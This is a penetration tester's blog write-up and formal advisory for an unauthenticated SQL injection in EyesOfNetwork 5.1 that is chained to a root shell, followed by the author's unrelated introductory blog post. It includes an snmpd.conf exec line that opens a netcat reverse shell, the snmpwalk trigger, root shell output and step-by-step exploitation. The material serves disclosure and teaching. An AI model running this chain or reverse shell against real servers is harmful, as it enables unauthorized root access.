[root@localhost ~]# ps aux | grep snmpd
root      8297  0.0  0.6 223424 12448 ?        Ss   mars27   1:29 /usr/sbin/snmpd -LS0-6d -f
root     24404  0.0  0.0 112648   968 pts/0    R+   06:16   0:00 grep --color=auto snmpd

[root@localhost snmp]# pwd
/etc/snmp
[root@localhost snmp]# ls -al
total 36
drwxr-xr-x.  2 root root    46 27 mars  14:07 .
drwxr-xr-x. 85 root root  8192 27 mars  12:14 ..
-rw-rw-rw-.  1 root root 18955 27 mars  14:07 snmpd.conf
-rw-rw-rw-.  1 root root   129 27 mars  14:07 snmptrapd.conf

[root@localhost snmp]# cat /etc/sudoers
...
# eonweb
apache ALL=NOPASSWD:/bin/systemctl * snmptt,/bin/systemctl * snmptrapd,/bin/systemctl * snmpd,/bin/systemctl * nagios,/bin/systemctl * gedd,/usr/bin/nmap

So, by default, anybody could edit the SNMP configuration, reload the server using sudo and the process will be run as root. Fortunately, we do not even need to find an RCE to perform these actions as they are available in the web interface Eonweb.

At /module/admin_process/ we are able to restart/reload the different processes in EyesOfNetwork:

And, even if I wasn’t able to find it in the interface, an administrator can edit directly the SNMP configuration file, going to /module/admin_files/?file=snmpconf.

What’s so interesting about SNMP? It is possible to execute shell commands by setting a specific instruction inside it and call for the correct OID.

// snmpconf
...
exec rioru /bin/nc -e /bin/bash <reverse ip> <port>
...

Now we have to access the SNMPd service either with snmpwalk directly if 161/udp is open and do snmpwalk -v 1 <EON ip> -c <community> .1.3.6.1.4.1.2021.8 or we could, once again, use the tools available in Eonweb to trigger the command execution, for example if there is a firewall present between EON and our machine blocking SNMP requests.

At /module/tool_all/, a snmpwalk tool is available, by default it is recovering all the MIB, but since the host is the last argument from the command line, we can set the host to <host> <OID> and get our connect-back.

And in our connect-back shell we previously set-up:

rioru@zhsk:~/perso$ nc -l -p 4444 -v
listening on [any] 4444 ...
192.168.1.161: inverse host lookup failed: Unknown host
connect to [192.168.1.27] from (UNKNOWN) [192.168.1.161] 54388
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:snmpd_t:s0
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.161  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::70d7:a7c2:630f:681f  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:dc:69:9a  txqueuelen 1000  (Ethernet)
        RX packets 664160  bytes 59288971 (56.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 185658  bytes 101831097 (97.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 256506  bytes 31487186 (30.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 256506  bytes 31487186 (30.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Final privilege escalation scenario:

Edit the snmpconf via admin_files and search for the correct community
Reload the service via admin_process
Call the correct snmp OID either if SNMP is accessible or using tools from Eonweb in tool_all

Automating the attack

Now that we have all these elements, a complete scenario is possible:

Exploiting the Unauthenticated SQL Injection to recover either: sessions or accounts (password are stored in simple md5).
Authenticate on the application
Recover the SNMP community
Edit the snmpd config files to add a malicious command
Execute the command using snmpwalk (either remotely or locally using the tools available in eonweb)
We have our root-privileged execution :).

Timeline

01st February 2017 - Initial Discovery
14th March 2017 - Public disclosure of an authenticated SQL injection and an RCE in Eonweb by Sysdream
27th March 2017 - First contact with the vendor
28th March 2017 - Created the proof of concept for the exploit
28th March 2017 - CVE request to DWF
29th March 2017 - Acknowledgement of the vendor
07th May 2017 - Got assigned a CVE ID via DWF (CVE-2017-1000060)

Final Advisory

Title:
======
EyesOfNetwork (EON) 5.1 Unauthenticated SQL Injection in eonweb leading to remote root

Author:
=======
Dany Bach [@ddxhunter, rioru.github.io]

CVE-ID:
=======
CVE-2017-1000060

OVE-ID:
=======
OVE-20170328-0001

Risk Information:
=================
CVSS Base Score		10.0
CVSS Vector		CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:U/RC:C
CVSS Temporal Score	9.7
Overall CVSS Score	9.7

Timeline:
=========
2017-02-01 - Initial Discovery
2017-03-14 - Public disclosure of an authenticated SQL injection and an RCE in Eonweb by Sysdream
2017-03-27 - First contact with the vendor
2017-03-28 - Created the proof of concept for the exploit
2017-03-28 - CVE request to DWF
2017-03-28 - Acknowledgement of the vendor
2017-05-03 - Got assigned a CVE ID via DWF (CVE-2017-1000060)

Status:
=======
Published

Affected Products:
==================
EyesOfNetwork ("EON") 5.1 and older

Vendor Homepage:
================
https://www.eyesofnetwork.com/?lang=en

Details:
========
By exploiting an unauthenticated SQL injection in Eonweb (logout.php), it is possible to gain remote root access to the server using a lack of proper permissions in SNMPd after an authentication using the sessions table.

Vulnerable file:
================
logout.php, Line 28
...
if(isset($_COOKIE["session_id"])) {
	$sessid=$_COOKIE["session_id"];
	sqlrequest($database_eonweb,"DELETE FROM sessions where session_id='$sessid'"); // Vulnerable
}
...

Proof of Concept:
=================
https://gist.github.com/rioru/105fb626b5ce046d8f050032da24ad2d

Fix:
====

Mandatory Hello World

Tue, 07 Mar 2017 00:00:00 +0100

Greetings,

My name is Dany, even if you can call me Rioru.

I finally decided to launch my blog on github using Jekyll to generate my pages. I used to have a blog but since I created it when I was 17, I decided it was better to start once again from scratch.

This blog will mostly talk about computer security, generally from the point of view of a penetration tester. I’ll share my tips, tricks and thoughts here.

<?php
echo "Hello World";
?>

See you around. Cheers.